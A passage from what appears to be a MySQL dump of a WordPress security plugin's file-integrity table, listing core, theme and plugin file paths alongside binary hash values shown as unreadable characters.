���B�','',0,'?'),('<�DHځ\0h�=ma#','wp-content/themes/tortuga/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v��O��<Lc\"�X |','��~��A���V��J~�{�0�-�R��=#�5 ','',0,'?'),('<�hj�	�4���4a�2�','wp-includes/js/utils.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2���![pNI�5','iII4�*��{FZan�Ǡ�)J,T�&�g��','',0,'?'),('<��,�O�#e�m��','wp-content/themes/verbosa/admin/options.php',0,'�p�,���^�)w�G�\n','�p�,���^�)w�G�\n','��0>I%�q��Y�1����	��E�3�~E���','',0,'?'),('<��u꿖\Zܜ��Y�^','wp-includes/js/tinymce/plugins/wpeditimage/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�j�<�]�@����	4�','\r]\"��!�\'sg=�����zķQ��2�NK�','',0,'?'),('<�l1TmF}m��r��','wp-content/plugins/all-in-one-wp-security-and-firewall/classes/wp-security-file-scan.php',0,'�y%�4\rه�5v\Z�/','�y%�4\rه�5v\Z�/','�9	Q�ޖ�4�Փ\Z�n�\"��2֍(8F���(�0','',0,'?'),('<�L�@�ԧ+�2���+','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-user-accounts-menu.php',0,'�8��/�F�ˌu%�','�8��/�F�ˌu%�','[ch4}�!iB�^�p:/�aZB�d�/�ybr�','',0,'?'),('=J��ǰja�}LI�Z','wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��pF��t1�+���','�;�}��\0[���\'\rq�����ĥd�;#�.','',0,'?'),('=���f;V�dl\"��','wp-admin/css/code-editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�)?s��E�H����','��y���q��}l��[�=��	�n(�cL�C','',0,'?'),('=	]��}��*<.','wp-content/plugins/wordfence/views/waf/waf-install-manual.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�=\'mP��x5KbY.�','i�M�Q�����W\r���d�ɸ���','',0,'?'),('=(}�\'��n/�d\r�̧','wp-content/themes/fluida/cryout/customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�8Ly\ZK�c/���','��$�V��i�u]����e�4(�W��v','',0,'?'),('=)����u7���|/�OM','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.de.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��o��2��\0��','14�ê�$CuHP�BgL��4��b��Sj��','',0,'?'),('=,��y	�n�S�eZ�iS','wp-content/themes/fabulous-fluid/images/checkbox-active.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g(�`�%��Y��N','l@�9¥�.���$�qG#B��\0�\\׀I�_��','',0,'?'),('=@�}��g\r��Zx[<�','wp-content/themes/twentytwenty/.stylelintrc.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�#f˭�Jlǿ�','I���l2�S���i.k�R�3�}��8V!<�','',0,'?'),('=A��3�����Zi�-','wp-content/themes/twentytwentyone/assets/sass/05-blocks/paragraph/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\'R�xPoKMF��j\'�_.','s/�\\~��К���̄˹uߠ�e������','',0,'?'),('=J�[|�2�K٠Z���','wp-content/themes/accelerate/page-templates/contact.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>hl���*|.�ed��l','�������2�)S$�\\�[LuZ%cPQ�;�n','',0,'?'),('=S�6�a��Xo�,�2','wp-content/plugins/wordfence/vendor/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n�V8�\\���Bs','7�h�����>8b�ut^^�Rx�26�#i(�','',0,'?'),('=^�H�u��C��h�','wp-content/themes/hueman/assets/admin/css/hu_admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\��׵�2�qM�Fj','W�t�_c-l(���VY&^+�����ŷA��L','',0,'?'),('=f�u�A><Th���@','wp-includes/js/jquery/ui/progressbar.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z�sk�����Z�j	Y','���7���v��\r6��1��N9@v�7�$�a��','',0,'?'),('=�)_��th<V�а','wp-content/themes/sg-window/img/404.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yy+��8i�Y�`','!]�����h�~��](h����\"�ծ','',0,'?'),('=�����,�K�w�.','wp-content/themes/nirvana/languages/cs_CZ.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c��\'�̛��','��x���e�W��ma����1�j��-�Lg�','',0,'?'),('=����@1c9������','wp-content/themes/nirvana/fonts/DroidSans-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d@�,>���?g{','��1�	Z���L;%nU�A���-���7�','',0,'?'),('=�=Շ�/�Ԫ��f�','wp-content/themes/the-minimal/images/next.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M}�wn�R�wP��','_��$o��A���_�\0����R�?����Jγ�','',0,'?'),('=��[�J�A޼�h/�','wp-content/plugins/unyson/framework/includes/option-types/oembed/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eݣ�,���4CzVh','�驒�Y!�`?��5��6��v�?ؗg��\'','',0,'?'),('=��k�[4��� ��=�','wp-includes/comment-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ,{$�9wV��BƖo','�k�x�{�v�ط_B(�簜3򠹍��','',0,'?'),('=�ٌNez�G�)��~Z','wp-content/plugins/unyson/framework/extensions/shortcodes/static.php',0,'%�n�_��L榵m� �P','%�n�_��L榵m� �P','!^�T}l�������{{(8�������\\��','',0,'?'),('=��U}����ӳ2\0','wp-content/plugins/unyson/framework/helpers/class-fw-dumper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D]ſ��1\n[b��','��\"(��74m:�cX�\'�U�I��M\\��b[','',0,'?'),('=��\n��������Pr,y','wp-content/themes/skt-construction-lite/images/about1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X�e�?J�}2��X8M*�','xk�\r�����e��3�3>\\+�p?WD','',0,'?'),('=������bd(�i�','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/fullscreen.php',0,'�(��R��aݲ��:�','�(��R��aݲ��:�','�/j�+r����/�+�O�@�:e�U��C�','',0,'?'),('=��Ө��\0E���','wp-includes/blocks/verse/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',�|�j�g8�M��[','*E�H�+&G�Ѹմ�\0jY��u� �9%�aGn�d�','',0,'?'),('=�(�v��V�8��%N\r','wp-content/plugins/unyson/framework/extensions/backups/includes/module/tasks/type/download/type/class-fw-ext-backups-task-type-download-local.php',0,'�63*/?EI�����','�63*/?EI�����','�������� �2g�![(��\\�uw1��','',0,'?'),('=�;�{���e�6�5�','wp-includes/js/jquery/ui/effect-pulsate.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�*\r�I�͕;t��W��','�����BD8�=~�b���wJ=�� ǐ�E��','',0,'?'),('=�kH�~B~���M%d��','wp-content/plugins/dw-social-share/assets/img/style-4.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M?��\0ۡ#��{V��','l��\"N�3�1#ƿ.4�~j��\n�n��:�ǁ','',0,'?'),('=�F�혣�Æ��K&�','wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�9�:7���]6hVo��','߫��/Lk����OT�bdS�EiL9���~8','',0,'?'),('=噄\nA�K(���l','wp-includes/js/dist/keyboard-shortcuts.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$i�^�>�(yV�o�','v<���	�~�HnI���~���!ѕ��`�N','',0,'?'),('=�)�˥���mJ\Z(*��','wp-content/themes/vega/customize/theme-defaults.php',0,'Jy�&���w�jp�<','Jy�&���w�jp�<','k���U�xIU�G�;�ܷ��%��ߴ�v���','',0,'?'),('=�N�ǒG�U}K`��|','wp-content/themes/travelify/library/panel/metaboxes.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	I�O���i�h��8ͦ\0','��������|�zLD�@��2�1��u��','',0,'?'),('=�a������0&','wp-includes/js/jquery/ui/effect-slide.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��a�d��{2װ�','T�f��b������>�s;X<`0��<9��:�','',0,'?'),('=��!$���7<��@','wp-content/themes/relia/inc/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d_�5b.qG�C�','���Y.�e���{Zܾ9b\"JUG���\r1�YL�','',0,'?'),('>�a�e��Rd����ys','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.markmonitor.php',0,'r���+��e\\�0��','r���+��e\\�0��','@Bh��3��5��X�3���n�~l��B�2','',0,'?'),('>O��9<�A�)����','wp-content/themes/vega/assets/js/parallax.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\0Q�k�K��$Wo','�\Z�L	,A4���;�\0?��sT ����Y�','',0,'?'),('>�\\7�	����\r���','wp-content/themes/illdy/inc/customizer/panels/projects.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r\rӺ����6)��F','g2�(�姱�+6��cT`�c���b�|�o','',0,'?'),('>u�y�L@m�N=�{c','wp-content/themes/wen-business/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\f6�BlnjD\'7~`��','H2�]>(�l*��`��{t��>v�pzډ�\n�','',0,'?'),('>$��2�0�v~�&jCi','wp-content/themes/sg-window/img/icons/small/facebook.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s��x�坥I}�=�$','y²l+a�Wd���\\Wɷng�dQ��+��','',0,'?'),('>5��ˏ.y2Q[ڣ�1�','wp-includes/blocks/block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4����MǾ�t�X)	','���C}S\"!3��F���,du�S/�m8�z','',0,'?'),('>G��O�jP�l���B','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/lib/cast_to_int.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�����\'Ρ0�g2','ؚx\"�o�*I�\nQ��j�����T(�G\Z�.�\Z','',0,'?'),('>M/h�Ց����5�M4','wp-content/themes/nirvana/images/socials/Amazon.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�� �!��o���i\0�','>�4e!��a\n��1oQ��M\"���c���5�','',0,'?'),('>W��g2��Q�d0\Z�','wp-content/plugins/unyson/framework/includes/option-types/wp-editor/static/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��7L\r�v`$b����','U�:\r��\"��l��ޢE�Hkv\r˪��ȁ�','',0,'?'),('>Y��	�`�j�C&�','wp-content/themes/precious-lite/sidebar-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Yb>�����S2�{�_B','(*�N���\Z�ͺd_0��1��\\��d�����','',0,'?'),('>hЩ�XX*�v1���','wp-includes/theme-compat/comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Ϫ�-�Y�D��s��','���A8}���G(oܵ����SQ��:z��b','',0,'?'),('>k��ۂn�Z^�K\'','wp-content/themes/morfeu/languages/pt_BR.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;�A:�/qPe���','f(�\ZêNv\'���.�*�$	!{6Q�#\\޴��)','',0,'?'),('>ql�+�m�\05Ħ\"�^','wp-includes/js/customize-preview.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�tQ��M�ʈ�����','��=��y�0��RAB�b����)�?=�n�','',0,'?'),('>u��ʸ�!4N2��','wp-content/plugins/wordfence/fonts/roboto-KFOlCnqEu92Fr1MmEU9fBBc-AMP6lQ.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,�;L�\'��dee��','�+G�T}�m)*��[���c5�Z�N-v>�','',0,'?'),('>v]�{rq�6x�','wp-content/themes/twentynineteen/template-parts/content/content-excerpt.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�y��JkԌ`�M\"�r',';Ը�P��I��@?56�t���k�N�8@�=�4','',0,'?'),('>�l�?\'-���4��F�','wp-content/themes/vega/parts/header-logo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\0z��Sڮ*(�A�x','�U,K�\0�c�`^�\\�i��үx<k�\"��5','',0,'?'),('>������:Zj\rIql;','wp-content/themes/illdy/inc/customizer/panels/team.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�3�v���������','5j�t\'��z�-�Q�TR��o�E\",+��[�c	�','',0,'?'),('>�K��/IA��-v8P�','wp-content/plugins/all-in-one-wp-migration/lib/vendor/servmask/command/class-ai1wm-wp-cli-command.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')7y슇\0�]��\n]\0','ϗ�a���p����,ڠ�xlX�Y�e��2�>','',0,'?'),('>����\\4yx}��','wp-content/themes/clean-magazine/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���2�,�fj��pwպ','|���F�m��*X�/���G��a+\\l�?���>','',0,'?'),('>�9��~v���+e�','wp-content/themes/sg-window/publication/js/navigation.js',0,'�����x\n��I3��\n\Z','�����x\n��I3��\n\Z','ך�eEA�AZ�:��z��~m5C�L.e�H�gۖ','',0,'?'),('>�SW���`�ik�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-glacier.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Fa�\"\02�','�����hk����l���� ��v��	Q���yg','',0,'?'),('>��X�\r�b��ڟ�$W','wp-includes/class-wp-image-editor-gd.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\0	1�S	߰�','���d��������v�-�ÕYӵ7��*P��5','',0,'?'),('>�\nq��g�/����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/pullquote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�X�y����gr\"3g','a�55�\Z�\\���7w{Լ^d�����TK�','',0,'?'),('>�3�0� ֎�C�U�','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/io/Google_HttpRequest.php',0,'�O`�C�GR&���\ns','�O`�C�GR&���\ns','�ܘ5v��bH��u�	ȣDAl(�v��.�q�2','',0,'?'),('>��y��K��j�|','wp-content/themes/sg-window/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o®&�W3�$�Z���(	','.�ڻ�M_?�m���A��cޫ��d\'�V����','',0,'?'),('>�(Р����[G|�8�','wp-content/themes/illdy/layout/fonts/glyphicons/glyphicons-halflings-regular.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\'r2U�������X','3u�2;Wm��j��ۻ����\"\0!4���h0l:','',0,'?'),('>��7C�{@�.U�\"','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-box.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�oɘ�3�&;�� ','G�+O����=#4��>��� �񕸅','',0,'?'),('>�˾Q\"<�1s1�ҹ�','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ro.js',0,'n�\')55�T}B�hC','n�\')55�T}B�hC','\"��=��}:�B��I[o�)�;w�K�jO�4\'�','',0,'?'),('>��P!%�tVp�6�M','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.se.php',0,'����V?��O��\0�','����V?��O��\0�','\"Q�@���ɴ�{*�;l7�j�D�o��A�~�','',0,'?'),('>�M~��;Oo��-�I$0','wp-content/themes/twentynineteen/fonts/NonBreakingSpaceOverride.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f!��<�\r����yS�','\"-d���NN6�3�P`��ʜ`!��ڬ	�q�','',0,'?'),('>��%�e�;����','wp-content/themes/verbosa/admin/images/magazine-1col.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���/��|�fdL�.','��$b�(兼���uj�v�F�ˤ7�I','',0,'?'),('?� 4�X#�!�Mƙ','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.gtld.genericb.php',0,'Q^�\Z6��߼���\r!>','Q^�\Z6��߼���\r!>','|���siЊ���f����ح_�1�ǘ�!���{','',0,'?'),('?�ke�zC��\"!�@�','wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1623076348.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','89�\"��zz��Vv*��]','�ۆ%%l�:J�f<�bq��P���Pt˯}ߝ\"�f','',0,'?'),('?!�W*�&x(�R�e2','wp-content/themes/nirvana/fonts/sourcesanspro-light-webfont.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	9Դ�}��є����','_X��h�ɀ���p��y��\r���\0�k��\'�','',0,'?'),('?�ż��TU{_��U�','wp-content/themes/point/languages/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V%���W\n$`\"��/c�','��G��ܷ�B�^��#0�Z�8�;���Q���','',0,'?'),('?3����\'�UA~W/�','wp-content/plugins/spam-captcha/core/include/tokenize/LICENSE',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~w�M�J4aD��n�','+�m�xZ��>��\'��3졥\0��8=�M2f','',0,'?'),('?2yT!s|��t��u}','wp-includes/random_compat/random_bytes_dev_urandom.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��d�����\ZHr�','\nDfdvP�f�On:����a��г‘���X�','',0,'?'),('?7r���05TC\'���','wp-content/plugins/unyson/framework/views/backend-option-design-customizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���T}F|���a','�P���ܨ�x���_yh�C[�-�a�O�ۇʬ7','',0,'?'),('??Q$�P���.:X6','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-fast.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���0@�I�SB','�1����đ���,�h�-��h�>fھ�G]','',0,'?'),('?U������\'_l.�p','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core/X25519.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','o>B��	����IN�-y','��hl�[�������(�l~�Q�u�FM�	�','',0,'?'),('?X\\�mf��ڕڣ�g','wp-content/plugins/wordpress-seo/admin/taxonomy/class-taxonomy-columns.php',0,'��\'Za�\n���a��P9','��\'Za�\n���a��P9','�:��bf�W�b�_�\n��]�a���B!m$h','',0,'?'),('?Yv�q_����ۮXO','wp-content/plugins/wordfence/images/sort_both.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��%�B�Qx�SV.D','����6��\"@X�g\'�W7��w��gJ���q','',0,'?'),('?]�P�.��1����2b','wp-includes/js/tinymce/plugins/textcolor/plugin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�%i�3����f����','(��EL����b[��K�!s�ӊ�nIJ��','',0,'?'),('?^O)�0�O�[�sրkD','wp-content/themes/verbosa/resources/fonts/fontello.eot',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���I`��{fY@P2','��ɢ�W�\n���9���I�<�#�^yD�МS�(','',0,'?'),('?b���{ЛJ����b�','wp-content/themes/fabulous-fluid/sidebar-footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����#�+�[&m�V','��܍犿>w�m�y)t݊�e�+ᛊ+yu\\��C','',0,'?'),('?y\04�!gvQ��?��E,','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_type.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z������ϳ�T���S','��ȵ�*p�\n�\"-�y�������Y��','',0,'?'),('?��a��\rkк��O=i','wp-content/themes/relia/inc/images/relia_hero.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	g�~��	H����','�7\\�U�k[�cL�>d3��nc�c��e','',0,'?'),('?�_�nZ���Щ����^','wp-content/themes/clean-magazine/images/gallery/ads2-728x90.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���B�	irU\\�ӟ�','2�\0�7�\0p�M��ˏZ��L	�v.��2��','',0,'?'),('?�3#����gȯ��G�','wp-content/themes/alpha-store/img/loader-carousel.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','59���c�5��\Z���','?�:���V����)0~��0���H��b���w�U','',0,'?'),('?��=�@�M�$#��P7','wp-includes/js/dist/html-entities.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�)�طD��ɒ+L','�w��>����1Kw�E�h��)ZҚ��&��','',0,'?'),('?�%�\ZJa����\"','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/map/options.php',0,'�ڄ�s���1*ލ�yX','�ڄ�s���1*ލ�yX','`��k�J0��+�H�YYX؜q��=��yH�','',0,'?'),('?���C����!��Ӳ','wp-content/themes/twentynineteen/sass/modules/_accessibility.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X��*+��O}��g�','�/����h�f=@�0��5��H�0\r7t��m�8','',0,'?'),('?���~t:���g�t��','wp-content/themes/supernews/acmethemes/functions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L�����UT�X	�','wU,�-J���F���6�U;m!�<F�ݙ','',0,'?'),('?���5a��-���Һ1','wp-content/themes/mh-magazine-lite/languages/pt_BR.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���ȁ�ÎpN�S�','��F-f%L��u�+�D�/J�\"}!(+�\n�','',0,'?'),('?�Q6��P�A�\r5�','wp-content/themes/nirvana/images/socials/GooglePlus.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ߏ����B��','Z苒0�sx�}��us�QOl��o�G��','',0,'?'),('@.@\"r�› ��f�','wp-content/themes/relia/inc/custom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.���1aZ���nѻ�','��-w��H�\0iM���z{Y�b���O�!','',0,'?'),('@\Z݄����$S���x�','wp-content/plugins/login-lockdown/loginlockdown.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	���R\\b�}���P�','tu�_^\n��m[ٍM���_�q�d�<�g','',0,'?'),('@!�a�ie�\\1}ݱ�z','wp-content/themes/twentytwenty/assets/js/skip-link-focus-fix.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���3s{_ƕ]��p�','���o;~]�b�^�R�<�l$�ә��1�6','',0,'?'),('@G )�7x=��A��','wp-content/themes/twentytwentyone/assets/sass/05-blocks/audio/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"����i�qo��h	?�','ڴaWtĉ����q�)N��*x�*���q;T��0','',0,'?'),('@PY�GR�&dEaq��','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/notification/views/view.php',0,'�\'%��x}a��з','�\'%��x}a��з','-\"�ễ���C-���+�g���\n��M>mS�op','',0,'?'),('@V�$�K���<�1*�','wp-includes/css/jquery-ui-dialog.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�$�n&���\']','�[�1�o�M�M@�E�ԥ�}����:~gC�?','',0,'?'),('@\\����d[�w@H;�','wp-content/themes/mh-magazine-lite/languages/id_ID.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�Q͐\'E�@(','Ԉd�@[�M\\�.��1��JG��U�W�r','',0,'?'),('@^@�!WPw�����A','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/media-image/views/view.php',0,'0t����g�����߷6','0t����g�����߷6','\\��%���%��xVH��M�����eJCxA�F','',0,'?'),('@k/�����I�?T,','wp-includes/js/jquery/ui/datepicker.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4}�aX2nH��GWx�{','/4XAJ\Z����o>V��ꔆ�I����','',0,'?'),('@l��I��M�0Z%�r*','wp-content/themes/fabulous-fluid/js/customizer.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=��=L~�ʺC�','�;����:f�H����ж\0���JՉڊ ;�','',0,'?'),('@��̘9�#�L�y(��','wp-includes/images/arrow-pointer-blue.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','w��b�·*L���[��','����fb�ZD1.���V��aw�4l?��p�G^�{','',0,'?'),('@�N;�[8����ঔ�','wp-content/plugins/spam-captcha/core/lang/SL_framework-lt_LT.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��1���oÊ��?','�Uw�Ч}W2%[\"���k٫�\\+��]','',0,'?'),('@��г|��8ߞ�}�J�','wp-content/themes/barletta/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>w��O4�ˉ��*3p','���]���Nl��`ɤ��ج�ד)�,v2','',0,'?'),('@��L���:���(���','wp-content/plugins/wordfence/crypto/vendor/paragonie/random_compat/psalm-autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p��\0�6�&�	�','uj���v��d_���=\n�2fY+��V\\��','',0,'?'),('@�-��2�E���\n\rÑ,','wp-content/themes/mh-magazine-lite/woocommerce/woocommerce.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\0t��Y�R�4O�','�+h��P��z��(N�\\I�ɦ\':��b���8<','',0,'?'),('@���3)���-x��M��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/fa.js',0,'w��-%ݏ�)n��','w��-%ݏ�)n��','3�#B>���̙\ZO��9z4��`E]�','',0,'?'),('@������K��l��','wp-content/themes/fabulous-fluid/fonts/FontAwesome.otf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���=�W���b&�W','�}�.�����$]���%�0��R�Y�Sy�','',0,'?'),('@��\Z!z��r���W��p','wp-content/plugins/wordfence/views/waf/option-rules.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�.Գ� <`�ϒ&�','V5��;����S6��,�Uft��Yn`A','',0,'?'),('@�XD\n�\nRN��t���','wp-admin/images/menu.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\r�9#�d�Y`	���','�l��IE/(�p��\0�pn�T-O�z\"],=`�','',0,'?'),('@�Z:���$ �p\Z{�9','wp-content/themes/vega/sample/images/header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�v�u�x��;��3FJ','�K�U��M%m��3���7��\\�u��*��Xl\0','',0,'?'),('@�ȯ��&O�o���','wp-content/plugins/wordfence/lib/noc1.key',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9e�b\0��PO�����','_�u���j������P��-KOA�ܫ�����','',0,'?'),('@��޴����N�?','wp-content/themes/nirvana/content/content-gallery.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U 3��	ǧ̈́$\r��','�\\[.��Ώ\nKwc�ɨ+)7����~u���d','',0,'?'),('@�L��߯7�٭kقE','wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R١��.�1&;�@','Y>]��B�A���u��5u�6�jT�6��d\rr+','',0,'?'),('@�K������2ޔ��','wp-content/themes/hueman/assets/front/js/lib/jquery.flexslider.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�m޾)!�K�/M�0','�vi�өٱ�X�nd��kR{#���Wz�x�T�','',0,'?'),('@�;5�X��V��O�Z','wp-admin/images/mask.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���g~�\"��J��䩎�','��/<s�ԡ�)�\'�.�1��jkn�K9Q���','',0,'?'),('@�m����O��W','wp-admin/admin-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_A8[�V�Vm�!��c','�\n\n��d0JdωH�F�Pk|�i�Qd�Ͳ8','',0,'?'),('@�t�R>G�Hh��ס','wp-admin/css/revisions-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��=4pUW�3�k��','E�l{/�)���aΘ���T�8]iq�(�B�','',0,'?'),('@���iAS:k���O\Z','wp-content/themes/point/images/smallfthumb.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�������Fz]C�H4','�-�y��e�����<k�p}<1/eA)A�)��&','',0,'?'),('@�qu(\rK\'��\'u]�','wp-content/themes/fluida/content/content-page.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���9MpԞ]U\'�X','ʀ&\\ƻj���Ɋ�DU��E��� c�Ϲ�','',0,'?'),('@�s�Z��^����q�v','wp-admin/images/media-button-2x.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#�WI��\\��?��','�<�:��tn�kb�wi�&��	